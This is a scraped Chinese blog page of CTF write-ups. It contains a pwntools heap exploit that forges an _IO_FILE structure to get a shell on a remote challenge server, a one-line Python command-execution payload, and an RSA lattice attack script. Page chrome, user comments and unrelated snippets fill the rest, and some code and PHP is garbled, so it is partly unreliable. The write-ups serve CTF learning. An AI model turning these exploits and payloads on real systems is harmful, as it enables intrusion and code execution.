# p = process(’./pwn’)
elf = ELF(’./pwn’)
# libc = elf.libc
libc = ELF(’./libc-2.23.so’)
p = remote(“182.92.203.154”, 28452)
def add(idx, size, content):
p.sendlineafter(’>>’, ‘1’)
p.sendlineafter(’:’, str(idx))
p.sendlineafter(’:’, str(size))
p.sendafter(’:’, content)
def show(idx):
p.sendlineafter(’>>’, ‘2’)
p.sendlineafter(’:’, str(idx))
def edit(idx, content):
p.sendlineafter(’>>’, ‘3’)
p.sendlineafter(’:’, str(idx))
p.sendafter(’:’, content)
gdb.attach(p)
add(0, 0x108, ‘aaaa’)
edit(0, b’\x00’ 0x108 + p64(0xef1))
add(1, 0x1000, ‘bbbb’)
add(2, 0x108, ‘c’ 8)
show(2)
p.recvuntil(‘c’8)
leak = u64(p.recv(6) + b’\x00\x00’)
libc_base = leak - libc.sym[’__malloc_hook’] - 0x678
log.info(‘libc: ‘+ hex(libc_base))
_IO_list_all = libc_base + libc.sym[’_IO_list_all’]
payload = ‘A’ 0xF + ‘B’
edit(2, payload)
show(2)
p.recvuntil(‘B’)
leak = u64(p.recv(6).ljust(8, b’\x00’))
heap_base = leak - 0x110
log.info(‘heap: ‘+ hex(heap_base))
payload = b’\x00’ 0x100
io_file = b’/bin/sh\x00’
io_file += p64(0x61) + p64(0) + p64(_IO_list_all - 0x10) + p64(0) + p64(1)
io_file = io_file.ljust(0xc0, b’\x00’)
payload += io_file
payload += p64(0) 3 + p64(heap_base + 0x300 - 8) + p64(0) * 2 + p64(libc_base + libc.sym[‘system’]) #
edit(2, payload)
# p.sendlineafter(’>>’, ‘1’)
# p.sendlineafter(’:’, str(3))
# p.sendlineafter(’:’, str(0x600))
p.interactive()
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
babymaze2
下载附件,打开start.sh看到一个python2,就试了一下
__import__('os').system('cat flag')
- 1
common
看上去两组d都很大,但是都不满足约束,参考翅膀师傅博客得到这个。
e1 = 28720970875923431651096339432854172528258265954461865674640550905460254396153781189674547341687577425387833579798322688436040388359600753225864838008717449960738481507237546818409576080342018413998438508242156786918906491731633276138883100372823397583184685654971806498370497526719232024164841910708290088581
e2 = 131021266002802786854388653080729140273443902141665778170604465113620346076511262124829371838724811039714548987535108721308165699613894661841484523537507024099679248417817366537529114819815251239300463529072042548335699747397368129995809673969216724195536938971493436488732311727298655252602350061303755611563
n = 159077408219654697980513139040067154659570696914750036579069691821723381989448459903137588324720148582015228465959976312274055844998506120677137485805781117564072817251103154968492955749973403646311198170703330345340987100788144707482536112028286039187104750378366564167383729662815980782817121382587188922253
c1 = 39271160836162213728405548853500467610171589037641347982950067368350296408717130302411099962891020622232225098720695284264243919394719593177235568311124976424784821416166009510846995482324338900659678620851925668475721244397721581838040002233753151821878077740464487681032449719309712321030004216510516240908
c2 = 110634730206758314143299987274063428286038998145950564495694821227767810635503047321085509089258349773815210035303676053968697177003110450012551160491013789208474067061313949271818299884014409189329922793159364181874099755186716866973609682654442002908067481152356793858827763626010945150317647969041502152218
import gmpy2
def long_to_bytes(x):
return bytes.fromhex(hex(x)[2:])
for i in range(731, 682, -1):
print(i)
alpha2 = i / 2048
M1 = round(n ^ 0.5)
M2 = round(n ^ (1 + alpha2))
A = Matrix(ZZ, [
[n, -M1n, 0, n^2],
[0, M1e1, -M2e1, -e1n],
[0, 0, M2e2, -e2n],
[0, 0, 0, e1e2]
])
AL = A.LLL()
C = Matrix(ZZ, AL[0])
B = A.solve_left(C)[0]
phi1 = floor(e1 B[1] / B[0])
phi2 = floor(e2 * B[2] / B[0])
d1 = gmpy2.invert(e1, phi1)
d2 = gmpy2.invert(e2, phi2)
m1 = long_to_bytes(pow(c1, d1, n))
m2 = long_to_bytes(pow(c2, d2, n))
m = m1+m2
if b’flag’ in m:
print(m)
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
//level 2
if($_GET[‘hash2’] ===
G
E
T
[
′
h
a
s
h
3
′
]
∣
∣
m
d
5
(
_GET['hash3'] || md5(
GET[′hash3′]∣∣md5(_GET[‘hash2’]) !== md5(

<textarea class="comment-content" name="comment_content" id="comment_content" placeholder="优质评论可以帮助作者获得更高权重" maxlength="1000"></textarea>
<div class="comment-emoticon"><img class="comment-emoticon-img" data-url="https://csdnimg.cn/release/blogv2/dist/pc/img/" src="https://csdnimg.cn/release/blogv2/dist/pc/img/emoticon.png" alt="表情包"></div>
<span class="comment-emoticon-tip">插入表情</span>
<div class="comment-emoticon-box">
<div class="comment-emoticon-img-box">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:001.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/001.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:002.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/002.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:003.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/003.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:004.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/004.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:005.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/005.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:006.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/006.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:007.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/007.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:008.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/008.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:009.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/009.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:010.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/010.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:011.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/011.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:012.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/012.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:013.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/013.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:014.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/014.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:015.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/015.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:016.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/016.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:017.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/017.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:018.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/018.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:019.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/019.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:020.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/020.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:021.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/021.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:022.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/022.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:023.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/023.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:024.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/024.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:025.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/025.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:026.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/026.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:027.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/027.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:028.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/028.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:029.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/029.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:030.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/030.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:031.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/031.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:032.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/032.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:033.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/033.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:034.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/034.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:035.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/035.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:036.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/036.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:037.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/037.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:038.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/038.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:039.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/039.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:040.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/040.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:041.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/041.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:042.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/042.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:043.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/043.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:044.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/044.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:045.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/045.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:046.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/046.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:047.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/047.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:048.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/048.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:049.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/049.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:050.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/050.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:051.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/051.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:052.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/052.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:053.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/053.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:054.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/054.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:055.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/055.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:056.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/056.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:057.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/057.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:058.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/058.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:059.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/059.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:060.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/060.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:061.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/061.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:062.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/062.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:063.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/063.png">
<img class="emoticon-monkey-img" data-emoticon="[face]monkey2:064.png[/face]" src="https://g.csdnimg.cn/static/face/monkey2/064.png">
</div>
</div>
<div class="opt-box">
<div id="ubbtools" class="add_code">
<a href="#insertcode" code="code" target="_self"><i class="icon iconfont icon-daima"></i></a>
</div>
<input type="hidden" id="comment_replyId" name="comment_replyId">
<input type="hidden" id="article_id" name="article_id" value="111824668">
<input type="hidden" id="comment_userId" name="comment_userId" value="">
<input type="hidden" id="commentId" name="commentId" value="">
<div class="dropdown" id="myDrap">
<a class="dropdown-face d-flex align-items-center" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">
<div class="txt-selected text-truncate">添加代码片</div>
<svg class="icon d-block" width="200px" height="100.00px" viewBox="0 0 2048 1024" version="1.1" xmlns="http://www.w3.org/2000/svg"><path d="M597.33333292 298.666667h853.333334L1023.99999992 725.333333 597.33333292 298.666667z"></path></svg>
</a>
<ul class="dropdown-menu" id="commentCode" aria-labelledby="drop4">
<li><a data-code="html">HTML/XML</a></li>
<li><a data-code="objc">objective-c</a></li>
<li><a data-code="ruby">Ruby</a></li>
<li><a data-code="php">PHP</a></li>
<li><a data-code="csharp">C</a></li>
<li><a data-code="cpp">C++</a></li>
<li><a data-code="javascript">JavaScript</a></li>
<li><a data-code="python">Python</a></li>
<li><a data-code="java">Java</a></li>
<li><a data-code="css">CSS</a></li>
<li><a data-code="sql">SQL</a></li>
<li><a data-code="plain">其它</a></li>
</ul>
</div>
<div class="right-box" id="rightBox" data-type="2">
<span id="tip_comment" class="tip">还能输入<em>1000</em>个字符</span>
<a data-report-click="{"spm":"3001.4374"}" class="btn btn-sm btn-quick-comment" id="quickComment">“速评一下”</a>
<a data-report-click="{"mod":"1582594662_003","spm":"1001.2101.3001.4227","ab":"new"}"><input type="submit" class="btn btn-sm btn-comment" value="发表评论"></a>
</div>
</div>
</form>
<input type="button" class="bt-comment-show" value="评论">
</div>
<div class="comment-list-container" style="display: block;">
<a id="comments"></a>
<div class="comment-list-box"><ul class="comment-list"><li class="comment-line-box d-flex" data-commentid="14400091" data-replyname="qq_37924905"><div style="display: flex;width: 100%;"> <a target="_blank" href="https://blog.youkuaiyun.com/qq_37924905"><img src="https://profile.csdnimg.cn/F/F/E/3_qq_37924905" username="qq_37924905" alt="qq_37924905" class="avatar"></a> <div class="right-box "> <div class="new-info-box clearfix"> <a class="comment-tag" target="_blank" href="https://blog.youkuaiyun.com/blogdevteam/article/details/103478461">爱码士<img class="comment-tag-img" src="https://csdnimg.cn/release/blogv2/dist/components/img/commentTagArrowWhite.png" title="爱码士"></a><a target="_blank" href="https://blog.youkuaiyun.com/qq_37924905"><span class="name ">水巷石子</span></a><span class="colon">:</span><span class="floor-num"></span><span class="new-comment">看君一席文,胜读十年书!</span><span class="date" title="2020-12-29 18:30:37">14小时前</span><span class="new-opt-floating"><a class="btn-bt btn-reply" data-type="reply" data-flag="true">回复</a><a class="btn-bt btn-report"><img class="btn-report-img" src="https://i-blog.csdnimg.cn/blog_migrate/2576ca68948267d5b525986c74c70556.png" title=""><span data-type="report" class="hide-report">举报</span></a></span></div><div class="comment-like " data-commentid="14400091"><img class="comment-like-img unclickImg" src="https://i-blog.csdnimg.cn/blog_migrate/279b096a482502ae545b68c791c9e31e.png" title="点赞"><img class="comment-like-img comment-like-img-hover" style="display:none" src="https://i-blog.csdnimg.cn/blog_migrate/164559133c2a4b688adb616df20d63f7.png" title="点赞"><img class="comment-like-img clickedImg" src="https://i-blog.csdnimg.cn/blog_migrate/164559133c2a4b688adb616df20d63f7.png" title="点赞"><span></span></div></div></div></li></ul><ul class="comment-list"><li class="comment-line-box d-flex" data-commentid="14396052" data-replyname="qq_40542534"><div style="display: flex;width: 100%;"> <a target="_blank" href="https://blog.youkuaiyun.com/qq_40542534"><img src="https://profile.csdnimg.cn/D/D/E/3_qq_40542534" username="qq_40542534" alt="qq_40542534" class="avatar"></a> <div class="right-box "> <div class="new-info-box clearfix"> <a class="comment-tag" target="_blank" href="https://blog.youkuaiyun.com/blogdevteam/article/details/103478461">爱码士<img class="comment-tag-img" src="https://csdnimg.cn/release/blogv2/dist/components/img/commentTagArrowWhite.png" title="爱码士"></a><a target="_blank" href="https://blog.youkuaiyun.com/qq_40542534"><span class="name ">strive_day</span></a><span class="colon">:</span><span class="floor-num"></span><span class="new-comment">很好的文章,点赞</span><span class="date" title="2020-12-29 15:08:34">17小时前</span><span class="new-opt-floating"><a class="btn-bt btn-reply" data-type="reply" data-flag="true">回复</a><a class="btn-bt btn-report"><img class="btn-report-img" src="https://i-blog.csdnimg.cn/blog_migrate/2576ca68948267d5b525986c74c70556.png" title=""><span data-type="report" class="hide-report">举报</span></a></span></div><div class="comment-like " data-commentid="14396052"><img class="comment-like-img unclickImg" src="https://i-blog.csdnimg.cn/blog_migrate/279b096a482502ae545b68c791c9e31e.png" title="点赞"><img class="comment-like-img comment-like-img-hover" style="display:none" src="https://i-blog.csdnimg.cn/blog_migrate/164559133c2a4b688adb616df20d63f7.png" title="点赞"><img class="comment-like-img clickedImg" src="https://i-blog.csdnimg.cn/blog_migrate/164559133c2a4b688adb616df20d63f7.png" title="点赞"><span></span></div></div></div></li></ul><ul class="comment-list"><li class="comment-line-box d-flex" data-commentid="14391643" data-replyname="qq_37960603"><div style="display: flex;width: 100%;"> <a target="_blank" href="https://blog.youkuaiyun.com/qq_37960603"><img src="https://profile.csdnimg.cn/8/3/3/3_qq_37960603" username="qq_37960603" alt="qq_37960603" class="avatar"></a> <div class="right-box "> <div class="new-info-box clearfix"> <a class="comment-tag" target="_blank" href="https://blog.youkuaiyun.com/blogdevteam/article/details/103478461">爱码士<img class="comment-tag-img" src="https://csdnimg.cn/release/blogv2/dist/components/img/commentTagArrowWhite.png" title="爱码士"></a><a target="_blank" href="https://blog.youkuaiyun.com/qq_37960603"><span class="name ">ITKaven</span></a><span class="colon">:</span><span class="floor-num"></span><span class="new-comment">博主不光能写的一手好代码,还能写的一手好文章。</span><span class="date" title="2020-12-29 10:43:55">22小时前</span><span class="new-opt-floating"><a class="btn-bt btn-reply" data-type="reply" data-flag="true">回复</a><a class="btn-bt btn-report"><img class="btn-report-img" src="https://i-blog.csdnimg.cn/blog_migrate/2576ca68948267d5b525986c74c70556.png" title=""><span data-type="report" class="hide-report">举报</span></a></span></div><div class="comment-like " data-commentid="14391643"><img class="comment-like-img unclickImg" src="https://i-blog.csdnimg.cn/blog_migrate/279b096a482502ae545b68c791c9e31e.png" title="点赞"><img class="comment-like-img comment-like-img-hover" style="display:none" src="https://i-blog.csdnimg.cn/blog_migrate/164559133c2a4b688adb616df20d63f7.png" title="点赞"><img class="comment-like-img clickedImg" src="https://i-blog.csdnimg.cn/blog_migrate/164559133c2a4b688adb616df20d63f7.png" title="点赞"><span></span></div></div></div></li></ul><ul class="comment-list"><li class="comment-line-box d-flex" data-commentid="14390861" data-replyname="kimol_justdo"><div style="display: flex;width: 100%;"> <a target="_blank" href="https://blog.youkuaiyun.com/kimol_justdo"><img src="https://profile.csdnimg.cn/E/6/2/3_kimol_justdo" username="kimol_justdo" alt="kimol_justdo" class="avatar"></a> <div class="right-box "> <div class="new-info-box clearfix"> <a class="comment-tag" target="_blank" href="https://blog.youkuaiyun.com/blogdevteam/article/details/103478461">爱码士<img class="comment-tag-img" src="https://csdnimg.cn/release/blogv2/dist/components/img/commentTagArrowWhite.png" title="爱码士"></a><a target="_blank" href="https://blog.youkuaiyun.com/kimol_justdo"><span class="name ">不正经的kimol君</span></a><span class="colon">:</span><span class="floor-num"></span><span class="new-comment">大佬,我准备跟你混了!</span><span class="date" title="2020-12-29 10:06:15">22小时前</span><span class="new-opt-floating"><a class="btn-bt btn-reply" data-type="reply" data-flag="true">回复</a><a class="btn-bt btn-report"><img class="btn-report-img" src="https://i-blog.csdnimg.cn/blog_migrate/2576ca68948267d5b525986c74c70556.png" title=""><span data-type="report" class="hide-report">举报</span></a></span></div><div class="comment-like " data-commentid="14390861"><img class="comment-like-img unclickImg" src="https://i-blog.csdnimg.cn/blog_migrate/279b096a482502ae545b68c791c9e31e.png" title="点赞"><img class="comment-like-img comment-like-img-hover" style="display:none" src="https://i-blog.csdnimg.cn/blog_migrate/164559133c2a4b688adb616df20d63f7.png" title="点赞"><img class="comment-like-img clickedImg" src="https://i-blog.csdnimg.cn/blog_migrate/164559133c2a4b688adb616df20d63f7.png" title="点赞"><span></span></div></div></div></li></ul><ul class="comment-list"><li class="comment-line-box d-flex" data-commentid="14378663" data-replyname="weixin_44671737"><div style="display: flex;width: 100%;"> <a target="_blank" href="https://blog.youkuaiyun.com/weixin_44671737"><img src="https://profile.csdnimg.cn/E/3/5/3_weixin_44671737" username="weixin_44671737" alt="weixin_44671737" class="avatar"></a> <div class="right-box "> <div class="new-info-box clearfix"> <a class="comment-tag" target="_blank" href="https://blog.youkuaiyun.com/blogdevteam/article/details/103478461">爱码士<img class="comment-tag-img" src="https://csdnimg.cn/release/blogv2/dist/components/img/commentTagArrowWhite.png" title="爱码士"></a><a target="_blank" href="https://blog.youkuaiyun.com/weixin_44671737"><span class="name ">兴趣使然的程序猿</span></a><span class="colon">:</span><span class="floor-num"></span><span class="new-comment">666,反手就是一个赞,欢迎回赞哦~</span><span class="date" title="2020-12-28 13:38:04">昨天</span><span class="new-opt-floating"><a class="btn-bt btn-reply" data-type="reply" data-flag="true">回复</a><a class="btn-bt btn-report"><img class="btn-report-img" src="https://i-blog.csdnimg.cn/blog_migrate/2576ca68948267d5b525986c74c70556.png" title=""><span data-type="report" class="hide-report">举报</span></a></span></div><div class="comment-like " data-commentid="14378663"><img class="comment-like-img unclickImg" src="https://i-blog.csdnimg.cn/blog_migrate/279b096a482502ae545b68c791c9e31e.png" title="点赞"><img class="comment-like-img comment-like-img-hover" style="display:none" src="https://i-blog.csdnimg.cn/blog_migrate/164559133c2a4b688adb616df20d63f7.png" title="点赞"><img class="comment-like-img clickedImg" src="https://i-blog.csdnimg.cn/blog_migrate/164559133c2a4b688adb616df20d63f7.png" title="点赞"><span></span></div></div></div></li></ul><ul class="comment-list"><li class="comment-line-box d-flex" data-commentid="14375093" data-replyname="weixin_46036037"><div style="display: flex;width: 100%;"> <a target="_blank" href="https://blog.youkuaiyun.com/weixin_46036037"><img src="https://profile.csdnimg.cn/6/4/A/3_weixin_46036037" username="weixin_46036037" alt="weixin_46036037" class="avatar"></a> <div class="right-box "> <div class="new-info-box clearfix"> <a class="comment-tag" target="_blank" href="https://blog.youkuaiyun.com/blogdevteam/article/details/103478461">码哥<img class="comment-tag-img" src="https://csdnimg.cn/release/blogv2/dist/components/img/commentTagArrowWhite.png" title="码哥"></a><a target="_blank" href="https://blog.youkuaiyun.com/weixin_46036037"><span class="name ">hiya2021</span></a><span class="colon">:</span><span class="floor-num"></span><span class="new-comment">大佬好,babymaze2具体怎么解的能详细说一下吗?萌新不太懂。
import(‘os’).system(‘cat flag’)//这代码要怎么让远端执行?昨天回复



- <
- 1
- >
</div>


简单来说phar就是php压缩文档。它可以把多个文件归档到同一个文件中,而且不经过解压就能被 php 访问并执行,与file:// php://等类似,也是一种流包装器。
phar结构由 4 部分组成
stub phar 文件标识,格式为 xxx<?php x…
给人用的爬虫工具Requests
工具介绍:
Python3(python是很容易上手的编程语言,非常适合编程新手)
Requests(这是Python的一个开发库, 简洁好用)
lxml (可以通过xpath语法, 按需…


选择题
1.下列选项中的词语书写有错误的一项是(B)
A.湿润 脑髓 B.锐智 自栩 C.大度 丰富 D.蛮横 磕头
2.下列选项中的惯用词语,使用不得体的一项是(C)
A.学生给一位刚刚病愈后的老师写的信,最后的致敬语是“敬祝痊安”。
B.有位海外游子给其祖父写信,落款是“XX顿首”。
C.有位长辈给侄儿写信说:“此事望你钧裁。”
D.给朋友写信,末…


水巷石子: 看君一席文,胜读十年书!
strive_day: 很好的文章,点赞
ITKaven: 博主不光能写的一手好代码,还能写的一手好文章。
不正经的kimol君: 大佬,我准备跟你混了!
兴趣使然的程序猿: 666,反手就是一个赞,欢迎回赞哦~